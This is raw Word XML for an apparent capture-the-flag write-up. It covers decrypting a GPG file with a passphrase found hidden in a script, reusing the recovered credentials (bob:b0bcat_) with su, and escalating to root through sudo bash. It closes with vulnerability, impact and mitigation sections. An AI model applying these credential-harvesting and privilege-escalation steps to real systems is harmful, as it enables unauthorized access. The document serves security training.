      <w:proofErr w:type="spellStart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login.txt.gpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> (encrypted file)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>• staff.txt (internal notes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A6ACD" w14:textId="7EACC35B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44CF7C22" wp14:editId="66DA0AC7">
            <wp:extent cx="4828571" cy="1561905"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="125368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6897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15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03296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lastRenderedPageBreak/>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E6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staff.txt Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D15E7C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cat staff.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6522AB83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file contains internal information about users and weak security practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1AB327" w14:textId="16F6331B" w:rsidR="004F0E67" w:rsidRPr="00A7267C" w:rsidRDefault="004F0E67" w:rsidP="00A7267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A7267C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It hints at poor password usage and potential vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0191832A" w14:textId="2E9765EA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012D8D77" wp14:editId="4B98BE56">
            <wp:extent cx="5323809" cy="3419048"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="180733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304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23809" cy="3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92A9" w14:textId="5F3F7340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Secret Directory Exploration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28444446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cd /home/bob/Documents/Secret/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Keep_Out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/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Not_Porn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/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No_Lookie_In_Here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ls</w:t>
      </w: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br/>
        <w:t>cat notes.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFBFF6E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 hidden script was found containing multiple lines of text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2782FC2C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By taking the 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first letter of each line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, the password was derived:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6710FC53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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>HARPOCRATES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7D58BB" w14:textId="340A51EA" w:rsidR="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67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 w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C321D5" w14:textId="332443C9" w:rsidR="00A7267C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14937BC" wp14:editId="40EBE63D">
            <wp:extent cx="5114286" cy="2790476"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44978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7863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C4AA" w14:textId="2E9B479E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GPG Decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A29995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gpg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--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homedir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/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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/.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gnupg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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--batch --passphrase HARPOCRATES -d </w:t>
      </w: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login.txt.gpg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="32EAAB4B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 encrypted file was decrypted using the discovered password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA1EA2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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52361B25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bob:b</w:t>
      </w:r>
      <w:proofErr w:type="gram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0bcat_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC42AC" w14:textId="6CF17B2F" w:rsidR="004F0E67" w:rsidRPr="00A7267C" w:rsidRDefault="004F0E67" w:rsidP="00A7267C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A7267C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These credentials were used for privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABA2C69" w14:textId="546F7FC3" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="00A7267C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54853621" wp14:editId="0532F706">
            <wp:extent cx="5731510" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="101322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22489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6B367" w14:textId="50084EA4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Initial Access (bob)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5D489D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proofErr w:type="spell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su</w:t>
      </w:r>
      <w:proofErr w:type="spell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bob</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B792D7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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688919D8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b0bcat_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB16834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 xml:space="preserve">Successfully switched to user </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E67">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>bob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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD11BA" w14:textId="7D0AA19C" w:rsidR="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DBB091" w14:textId="4807D63A" w:rsidR="00A7267C" w:rsidRPr="004F0E67" w:rsidRDefault="0062538B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FB25C63" wp14:editId="5AA094AC">
            <wp:extent cx="5731510" cy="1651000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="3405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61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CECF" w14:textId="57787BF5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Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863A48E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sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ACC5C3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command checks what commands the user can run as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2B8C13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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA9A49F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(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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ALL :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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 xml:space="preserve"> ALL) ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301D3AEF" w14:textId="3FDBB1C6" w:rsidR="004F0E67" w:rsidRPr="0062538B" w:rsidRDefault="004F0E67" w:rsidP="0062538B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62538B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means the user can execute any command as root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A6F085" w14:textId="17421F59" w:rsidR="004F0E67" w:rsidRDefault="0062538B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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB94BC2" wp14:editId="2A256E74">
            <wp:extent cx="5731510" cy="3012440"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="42935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563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F8DFA" w14:textId="77777777" w:rsidR="0062538B" w:rsidRPr="004F0E67" w:rsidRDefault="0062538B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4665F190" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F0E6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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w: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0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF0F395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sudo bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD85E6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This command provides a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3221F6E2" w14:textId="0CFD4D31" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="0062538B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6C87107D" wp14:editId="3DF83972">
            <wp:extent cx="5731510" cy="4906645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="115667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67052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91245" w14:textId="5467C5F2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Root Access Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EB68F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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467E6F74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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1D72D9" w14:textId="2C21A65D" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="006253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root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCBF507" w14:textId="427BEBA8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Root Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483F3AC" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E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</w:pPr>
      <w:r w:rsidRPr="004F0E6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kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>cat /flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347548C2" w14:textId="0CA7C4B7" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="0062538B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1B32560F" wp14:editId="74414685">
            <wp:extent cx="5731510" cy="7285355"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1414868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682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8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51BA9" w14:textId="0A73366A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Flags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9"/>
        <w:gridCol w:w="3595"/>
      </w:tblGrid>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="784F9D0D" w14:textId="77777777" w:rsidTr="004F0E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B2EC6D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Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3824D6C2" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E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 w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004F0E67" w:rsidRPr="004F0E67" w14:paraId="51CD432A" w14:textId="77777777" w:rsidTr="004F0E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8EDFE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Root Flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05DEDCE7" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E6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</w:pPr>
            <w:r w:rsidRPr="004F0E67">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CONGRATS ON GAINING ROOT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A967368" w14:textId="0223F354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08D62BC2" w14:textId="3EAA4BDE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lastRenderedPageBreak/>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B597630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t>• Exposed robots.txt endpoints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>• Command Injection (RCE)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>• Weak credential storage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>• GPG weak passphrase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>• Password reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>• Misconfigured sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217D891" w14:textId="0D267E79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77DC174D" w14:textId="35544274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Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176E300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An attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF64EB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• Execute arbitrary commands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Gain shell access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Extract credentials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Escalate privileges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Fully compromise the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF771D" w14:textId="18CE978A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4D899B61" w14:textId="411FCEE5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Mitigation Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331ABE38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• Remove exposed development endpoints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Validate user input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Use strong password policies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Secure sensitive files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Restrict sudo privileges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Implement proper encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240025FD" w14:textId="489849B9" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E67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</w:p>
    <w:p w14:paraId="34BE24DE" w14:textId="4953F094" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E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b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Learning Outcomes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9916D6" w14:textId="77777777" w:rsidR="004F0E67" w:rsidRPr="004F0E67" w:rsidRDefault="004F0E67" w:rsidP="004F0E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</w:pP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t>• Web enumeration using Nikto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robots.txt exploitation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Command injection attacks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Reverse shell handling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Credential harvesting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GPG decryption</w:t>
      </w:r>
      <w:r w:rsidRPr="004F0E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-IN" w:bidi="kn-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:br/>
        <w:t>• Privilege escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2231B" w14:textId="12B4814E" w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidRDefault="00B077AB" w:rsidP="004F0E67">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B077AB" w:rsidRPr="00DA1C91" w:rsidSect="008D6BB5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FD9F87" w14:textId="77777777" w:rsidR="009F4B97" w:rsidRDefault="009F4B97" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7C317BF8" w14:textId="77777777" w:rsidR="009F4B97" w:rsidRDefault="009F4B97" w:rsidP="006B74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1E2D3" w14:textId="77777777" w:rsidR="009F4B97" w:rsidRDefault="009F4B97" w:rsidP="006B74F2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0A1FED19" w14:textId="77777777" w:rsidR="009F4B97" w:rsidRDefault="009F4B97" w:rsidP="006B74F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B7066"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EA6E1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53B8A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C56C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F7913"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="32B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D7059"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C742D0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AF74C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DAC25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2792F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C030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A6669F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A9E52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1812A2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17126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7C6860"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DADA9A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36166C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D15C4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65006F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEAC9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E41E14"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26D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D84FA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D47AF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B26046"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="663E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5D6DB4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9EFA6E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21D1E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BFC1F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76327FF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412CA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5B1D5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4EF68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B07882"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47A84D9E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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="322F6D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB8881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A426AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21B21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4BB1C80"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="397CA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601B8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B425D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A449F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F28477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176404"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8200A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3B4D70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E467B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997172"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="859C1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890543"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7144CE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517297"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AAEE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D8183B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76B2F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B164478"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC2AD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5F6FFF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C6C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ED2026"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D74893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1323DD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="893C5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3A95327"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="851E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BE41A4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FBDE2A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06127D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F1AAAF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3D6A10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77A8F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3D93B81"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9468B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528033F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6E507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A34EC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF06E7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8F13738"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2BDC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006408"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA9AEA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3C4CE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9B14D5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B10559"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="95C895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8A8273A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="64C68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1B111D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66FC3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227455"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7ED6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6734183">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1919703842">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="854657234">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="75059167">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1055350748">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1281497459">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="180512877">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1339381322">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1406992489">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1468862676">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1489515906">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1590626527">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1069304177">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="246619170">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="761687924">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1490438223">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="370887772">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="2098289267">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="992946472">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="440150709">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="737436382">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="339238045">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="127431437">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1361736950">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="577136631">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="391393925">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1420642320">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1185250454">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="36243098">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1215579138">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="541331620">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1291665567">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="58552583">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1680346185">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1861115741">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="593979621">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1059941029">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="276957576">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="555943615">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1338969666">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="657002878">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="530189751">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="99616231">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1906841283">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="229855601">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="548105877">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="840697822">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="18056566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8CA"/>
    <w:rsid w:val="00015FA0"/>
    <w:rsid w:val="00017F2D"/>
    <w:rsid w:val="00022BCE"/>
    <w:rsid w:val="00071B67"/>
    <w:rsid w:val="000A680C"/>
    <w:rsid w:val="000C75F8"/>
    <w:rsid w:val="000D332E"/>
    <w:rsid w:val="00130FA5"/>
    <w:rsid w:val="001968EA"/>
    <w:rsid w:val="001F4EFF"/>
    <w:rsid w:val="00206633"/>
    <w:rsid w:val="002478D9"/>
    <w:rsid w:val="0029654C"/>
    <w:rsid w:val="003C09DA"/>
    <w:rsid w:val="00477890"/>
    <w:rsid w:val="004F0E67"/>
    <w:rsid w:val="00521772"/>
    <w:rsid w:val="00582653"/>
    <w:rsid w:val="0062538B"/>
    <w:rsid w:val="006B74F2"/>
    <w:rsid w:val="006F640F"/>
    <w:rsid w:val="00735062"/>
    <w:rsid w:val="00745351"/>
    <w:rsid w:val="00785791"/>
    <w:rsid w:val="00791A99"/>
    <w:rsid w:val="007E4FF6"/>
    <w:rsid w:val="00804C9D"/>
    <w:rsid w:val="00847F1E"/>
    <w:rsid w:val="00854119"/>
    <w:rsid w:val="00886AC1"/>
    <w:rsid w:val="008D6BB5"/>
    <w:rsid w:val="00903D9D"/>
    <w:rsid w:val="00961A2C"/>
    <w:rsid w:val="009F4B97"/>
    <w:rsid w:val="00A7267C"/>
    <w:rsid w:val="00B0391F"/>
    <w:rsid w:val="00B077AB"/>
    <w:rsid w:val="00B41E01"/>
    <w:rsid w:val="00B56205"/>
    <w:rsid w:val="00B80FCF"/>
    <w:rsid w:val="00B9321C"/>
    <w:rsid w:val="00BB170A"/>
    <w:rsid w:val="00BB6B92"/>
    <w:rsid w:val="00BD621B"/>
    <w:rsid w:val="00C00870"/>
    <w:rsid w:val="00C3612F"/>
    <w:rsid w:val="00C4409C"/>
    <w:rsid w:val="00C57F5F"/>
    <w:rsid w:val="00C6792E"/>
    <w:rsid w:val="00C818CA"/>
    <w:rsid w:val="00CC5C4E"/>
    <w:rsid w:val="00CF232A"/>
    <w:rsid w:val="00DA1C91"/>
    <w:rsid w:val="00DF21FB"/>
    <w:rsid w:val="00DF5DC1"/>
    <w:rsid w:val="00E74AA9"/>
    <w:rsid w:val="00E92920"/>
    <w:rsid w:val="00EB19EB"/>
    <w:rsid w:val="00EB1C6E"/>
    <w:rsid w:val="00EF2672"/>
    <w:rsid w:val="00FB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B633E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1D31A421-CDF1-4181-BFC2-B79D365CF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1B67"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00C81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8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8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8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8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8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8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8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8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8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8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8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8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8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8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8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8C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D6BB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D6BB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PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00735062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735062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CC5C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C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21772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B7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74F2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
